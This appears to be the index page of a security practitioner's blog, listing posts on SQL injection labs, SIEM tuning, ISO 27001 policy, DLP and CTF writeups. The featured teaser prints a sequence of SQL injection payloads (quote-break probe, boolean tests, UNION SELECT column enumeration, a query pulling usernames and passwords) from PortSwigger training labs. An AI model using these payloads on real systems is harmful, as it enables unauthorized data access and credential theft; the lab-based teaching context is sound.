~/portfolio / blog

Field notes.

Writeups, postmortems, and short essays on offensive testing, blue-team operations, and the politics of writing good security policy.

latest 2026.04.28 · 12 min read

Walking through PortSwigger's SQLi labs: from boolean to union-based.

A guided run through five Web Security Academy labs — what each vulnerability actually looks like in Burp, where the payload comes from, and the one defensive control that would have stopped every one of them.

read post →

01# detect injection point

02GET /filter?category=Gifts'

03# → 500 Internal Server Error

05# confirm boolean condition

06GET /filter?category=Gifts'+AND+'1'='1

07GET /filter?category=Gifts'+AND+'1'='2

09# enumerate columns via UNION

10?category=Gifts'+UNION+SELECT+NULL--

11?category=Gifts'+UNION+SELECT+NULL,NULL--

13# extract data

14SELECT username, password

15FROM users

02 all posts

2026.04.28

Walking through PortSwigger's SQLi labs: from boolean to union-based

Five Web Security Academy labs broken down step-by-step in Burp, with the one defensive control that would have stopped each of them.

sqli·burp·owasp·12 min

// web sec → 2026.03.14

Tuning Wazuh to stop crying wolf

A 4-week project to cut SIEM alert noise by 70%. The diff between rule volume and signal — and how I learned to write decoders that don't match everything.

wazuh·siem·detection·9 min

// blue team → 2026.02.02

Writing ISO 27001 policies that engineers actually read

Compliance reads like a wall. Field guide: how I rewrote 14 client policies into single-page mappings between control IDs and on-call playbooks.

iso 27001·governance·7 min

// grc → 2025.12.18

DLP without the drama: building and rolling out the system

How I built the Python + YARA DLP engine, why most rollouts die by week two, and the phased approach that surfaces real exfil without breaking marketing's workflow.

dlp·python·yara·10 min

// tooling → 2025.11.04

Network forensics with a 200-line Scapy sniffer

Why I wrote a custom packet sniffer instead of leaning on tcpdump — and what structured logging unlocks for downstream correlation in Wazuh.

scapy·python·forensics·8 min

// tooling → 2025.09.22

12 days of TryHackMe: notes from the writeup series

What I learned shipping 12 walkthroughs back-to-back. Privilege escalation patterns, the OSINT habits that keep paying off, and the rooms I'd skip.

tryhackme·ctf·privesc·6 min

// ctf → 2025.07.10

Securing a FastAPI backend in under an hour

The four things I always set up first: signed sessions, rate limits, structured input validation, and an auth boundary that says no by default.

fastapi·api·python·5 min

// app sec → 2025.05.30

Office security audits: the checklist that survived contact with reality

What I actually look for when walking a floor — beyond the vendor checklist. Wi-Fi segmentation, badge habits, and the three printer settings nobody changes.

audit·physical·iso 27001·8 min

// grc →

posts published

total min read

active topics

~2/mo

cadence